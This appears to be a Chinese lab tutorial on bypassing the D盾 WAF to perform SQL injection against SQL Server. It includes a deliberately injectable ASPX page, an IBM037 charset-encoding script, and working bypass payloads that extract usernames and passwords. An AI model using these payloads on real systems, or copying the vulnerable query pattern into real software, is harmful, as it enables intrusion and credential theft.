BypassD盾之SQL注入绕过总结
SQLServer特性
空格可以由其它字符替代
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
- 位置①
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、—+a%0d%0a
- 可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
- 位置②
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、—+a%0d%0a
- 可以利用加号+替换空格:union+select
- 位置③
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、—+a%0d%0a
- 可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
- 可以利用小括号()替换空格:select(1),2,db_name()
- 位置④
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、—+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服务器支持)
- 位置⑤
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、—+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服务器支持)
- 可以利用点号.替换空格:from.users
- 可以利用中括号[]替换空格:from[users]
实验环境
数据库:SQL Server 2008R2
Web服务器:IIS7.5 CN
WAF:D盾_v2.1.6.1[测试版]
靶场源码如下:index.aspx
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import namespace="System.Data.SqlClient" %>
"server">
private DataSet resSet=new DataSet();
protected void Page_Load(object sender, EventArgs e)
{
String strconn = "server=.;database=test;uid=sa;pwd=admin";
string id = Request.Params["id"];
string sql = string.Format("select * from newss where id={0}", id);
SqlConnection connection=new SqlConnection(strconn);
connection.Open();
SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
dataAdapter.Fill(resSet);
DgData.DataSource = resSet.Tables[0];
DgData.DataBind();
Response.Write("执行语句:
"+sql);
Response.Write("
结果为:");
}
"http://www.w3.org/1999/xhtml">
"server">
"Content-Type" content="text/html; charset=utf-8"/>
SQLServer注入测试
"form1" runat="server">
"DgData" runat="server" BackColor="White" BorderColor="#3366CC"
BorderStyle="None" BorderWidth="1px" CellPadding="4"
HeaderStyle-CssClass="head" Width="203px">
"#99CCCC" ForeColor="#003399" />
"#009999" Font-Bold="True" ForeColor="#CCFF99" />
"#99CCCC" ForeColor="#003399" HorizontalAlign="Left"
Mode="NumericPages" />
"White" ForeColor="#003399" />
"head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF">
另类字符集编码绕过
绕过原理
HTTP协议兼容性:HTTP Charset的多样性
Content-Type头中使用charset定义字符集的应用场景不只有在responses中,request中同样可以使用。
常见的服务器与可见编码如下所示:
服务器信息可用编码说明Nginx, uWSGI-Django-Python3IBM037, IBM500, cp875, IBM1026, IBM273对参数名和参数值进行编码,服务器会对参数名和参数值均进行url解码,需要对等号和& and进行编码(不进行url编码)Nginx, uWSGI-Django-Python2IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424对参数名和参数值进行便慢慢 服务器会对参数名和参数值均进行url解码 等号和&符号不应该以任何方式编码。Apache-TOMCAT8-JVM1.8-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025参数名按原始格式(可以像往常一样使用url编码)Body不论是否经过url编码均可等号和&符号不应该以任何方式编码Apache-TOMCAT7-JVM1.6-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码IIS6, 7.5, 8, 10 -ASPX (v4.x)IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码
实验步骤
我们使用如下脚本来进行编码转换:
import urllib
import sys
params = sys.argv[1]
charset= sys.argv[2]
def paramEncode(params="id=1", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
result = ""
equalSign = "="
ampersand = "&"
if encodeEqualSign:
equalSign = equalSign.encode(charset)
if encodeAmpersand:
ampersand = ampersand.encode(charset)
params_list = params.split("&")
for param_pair in params_list:
param, value = param_pair.split("=")
if urldecodeInput:
param = urllib.unquote(param).decode('utf8')
value = urllib.unquote(value).decode('utf8')
param = param.encode(charset)
value = value.encode(charset)
if urlencodeOutput:
param = urllib.quote_plus(param)
value = urllib.quote_plus(value)
if result:
result += ampersand
result += param + equalSign + value
return result
print(paramEncode(params,charset))
这里我们使用IBM037编码进行测试。
中文版的BurpSuite需要改变一下BurpSuite的字体类型
image-20211025173724964
然后使用BurpSuite抓包,并发送到Repeater
image-20211025173902801
修改请求方法为POST
image-20211025174140120
在Content-Type头中添加charset字段,值为ibm037
Content-Type: application/x-www-form-urlencoded;charset=ibm037
image-20211025174228156
使用脚本进行编码
python2 encode.py "id=1" IBM037 # 返回 %89%84=%F1
将请求内容改为%89%84=%F1,并发送
image-20211025174653394
可以看到正常返回查询数据
接下来就是进行SQL注入了
image-20211025174846914
成功绕过D盾WAF
D盾清洗数据缺陷+多个规则特性组合绕过
绕过原理
规则缺陷/特性:利用D盾清洗数据的特性
WAF内置多种解码器,经过多次解码以后可能导致绕过。
当攻击者提交的参数值中存在大量干扰数据时,如大量空格、TAB、换行、%0c、注释等,WAF需要对其进行清洗(为提升性能和降低规则复杂性),筛选出真实的攻击数据进行检测,但是,如果清洗方式不正确,会导致真正的攻击部分被清洗,然后拿去检测的是不含有攻击向量的数据,从而被Bypass。
规则缺陷/特性:数据库空格可使用其它字符替代
替代字符可查看SQLServer特性。
规则缺陷/特性:%00时会被认为读取已结束
在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留。
规则缺陷/特性:HTTP参数污染
同时提交参数id,会接收所有参数,通过逗号分隔。
实验步骤
抓包,并更改请求方法
image-20211028161329759
测试D盾清洗数据的特性:
D盾为了防御XSS攻击会对提交的特殊字符进行HTML实体编码,例如提交的数据为</code></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.50390625" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpx03St3Gib4tD2bnZ3LCJQibib7K1TU4zEQF18gnuO7u9StL7LatjP3zicMA/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028162308251</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">那么假如我们将提交一个已经实体化编码的数据呢?</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8253358925143954" data-s="300,640" data-type="png" data-w="1042" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxVCVfiahWlxoCHeYWzCKg3IeCiavmwQ6nL8GY3WdyyJghTKIhWxXGyZPw/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028163222933</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">这里并没有将<code style="white-space:pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;">></code>进行解码,而是将<code style="white-space:pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;">&</code>符进行编码</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.49517684887459806" data-s="300,640" data-type="png" data-w="1244" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxmUZnXBUW4dZxZnGqvydOhLKWFWwOfT1cYmUrHEyPvWhib1HqTvdvicqw/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028164318800</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">我们可以利用这个特性,使用这串字符去绕过某些多个关键字匹配的规则,如:union…select、order…by、/*…*/、'…' 等</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3109375" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxvrS2esx28GOBTnh9ibRAIpOicVMK2LibOic3yiaib2kicx6afXnthcyTpuNNw/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028171853112</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><strong style="line-height: 1.75;color: rgb(15, 76, 129);">绕过 and 1=1</strong></p><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">注:1.e可以代替空格</p><pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=1.eand/*%26%67%74%3b*/1=1</code></pre><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.3141945773524721" data-s="300,640" data-type="png" data-w="1254" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxJIpFLfObvKfhz20ibRJlu6yf6KgPcN7wv3wb2ZHj4LeJFojVm6EDVbQ/640?wx_fmt=png"></p><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028173512915<br></figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><strong style="line-height: 1.75;color: rgb(15, 76, 129);">绕过 order by</strong></p><pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=1 order/*%26%67%74%3b*/by 2</code></pre><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.28329297820823246" data-s="300,640" data-type="png" data-w="1239" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxDzhIkzwnLqgFSGvd7wJgiaImG3NGs7unfs2LTsRe4dS3b6GOS6UVMGw/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028174034111</figcaption></figure><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><strong style="line-height: 1.75;color: rgb(15, 76, 129);">绕过 union select</strong></p><pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL</code></pre><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.2703125" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxy5J0TGL8iabLzamKaB6iabb4d98oGpneJYxmtM0nXddCyqXugOvebfSw/640?wx_fmt=png"></p><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><strong style="line-height: 1.75;color: rgb(15, 76, 129);">绕过 from</strong></p><p style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(63, 63, 63);">from的绕过这就是一个技术活了,这里是利用到了HPP以及%00截断来进行绕过</p><pre style="overflow-x: auto;padding: 1em;background: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-radius: 8px;margin: 10px 8px;"><code style="line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;">id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users </code></pre><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.25" data-s="300,640" data-type="png" data-w="1280" style="height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxewvwIpAlaEVJSyyRU9pdEGHcmphHKNOhbtBUic8eIfQoIzx9eEE271A/640?wx_fmt=png"></p><figure style="font-size: 14px;white-space: normal;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;margin: 1.5em 8px;color: rgb(63, 63, 63);"><figcaption style="text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;">image-20211028174713969<span style="color: rgb(63, 63, 63);font-size: 14px;letter-spacing: 0.1em;text-align: left;"></span></figcaption></figure><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);color: rgb(163, 163, 163) !important;"><img class="rich_pages wxw-img" data-ratio="0.109375" data-type="png" data-w="640" style="outline: 0px;box-sizing: border-box !important;visibility: visible !important;width: 640px !important;height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_png/ndicuTO22p6ibN1yF91ZicoggaJJZX3vQ77Vhx81O5GRyfuQoBRjpaUyLOErsSo8PwNYlT1XzZ6fbwQuXBRKf4j3Q/640?wx_fmt=png"></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"><br style="outline: 0px;"></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255);" class="js_darkmode__0" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"><span style="outline: 0px;color: rgb(0, 0, 0);"><strong style="outline: 0px;">推荐阅读:</strong></span></p><p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><br style="outline: 0px;"></p><p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247488830&idx=1&sn=762f90f6ce3b98c76e74f194c2c0fc14&chksm=ec1f4001db68c917007d6b8f66737e91b3238afba7df379269b587e3cdc691e2c9257e3c4b16&scene=21#wechat_redirect" textvalue="精华 | SQL注入万能Bypass技巧" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" hasload="1" style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;font-size: 14px;"><span style="font-size: 14px;"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;color: rgb(0, 128, 255);"><strong style="outline: 0px;">精华 | SQL注入万能Bypass技巧</strong></span><strong style="outline: 0px;"></strong></span></a><br style="outline: 0px;"></p><p style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><br style="outline: 0px;"></p><h1 style="outline: 0px;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;"><span style="font-size: 14px;"><strong><span style="color: rgb(63, 63, 63);font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;">Bypass 护卫神SQL注入防御(多姿势) https://www.cnblogs.com/xiaozi/p/9138160.html</span></strong></span></h1><p style="margin: 1.5em 8px;white-space: normal;font-size: 14px;text-align: center;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><span style="font-size: 14px;"><strong>干货|各种WAF绕过手法学习</strong></span></p><p style="margin: 1.5em 8px;white-space: normal;font-size: 14px;text-align: center;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><span style="font-size: 14px;"><strong>https://blog.csdn.net/zhangge3663/article/details/116394692</strong></span></p><p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448903605&idx=1&sn=5a8df50ef8efbd5293fcf3a8712cd1b8&scene=21#wechat_redirect" textvalue="Bypass D盾_防火墙(新版)SQL注入防御" linktype="text" imgurl="" imgdata="null" tab="innerlink" style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;color: rgb(0, 128, 255);font-size: 14px;" data-linktype="2"><span style="font-size: 14px;"><strong><span style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 1.4px;text-align: left;color: rgb(0, 128, 255);">Bypass D盾_防火墙(新版)SQL注入防御</span></strong></span></a><span style="color: rgb(63, 63, 63);font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 14px;letter-spacing: 1.4px;text-align: left;"></span></p><p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"><br></p><p style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;"><strong data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-darkmode-color-15976329806349="rgb(255, 104, 39)" data-darkmode-original-color-15976329806349="rgb(255, 104, 39)" style="outline: 0px;color: rgb(255, 104, 39);font-size: 18px;letter-spacing: 0.544px;">点赞,转发,在看</strong></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"><br style="outline: 0px;"></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: right;color: rgb(163, 163, 163) !important;"><span style="outline: 0px;font-size: 13px;">原创作者:Ulysses</span></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__1" style="outline: 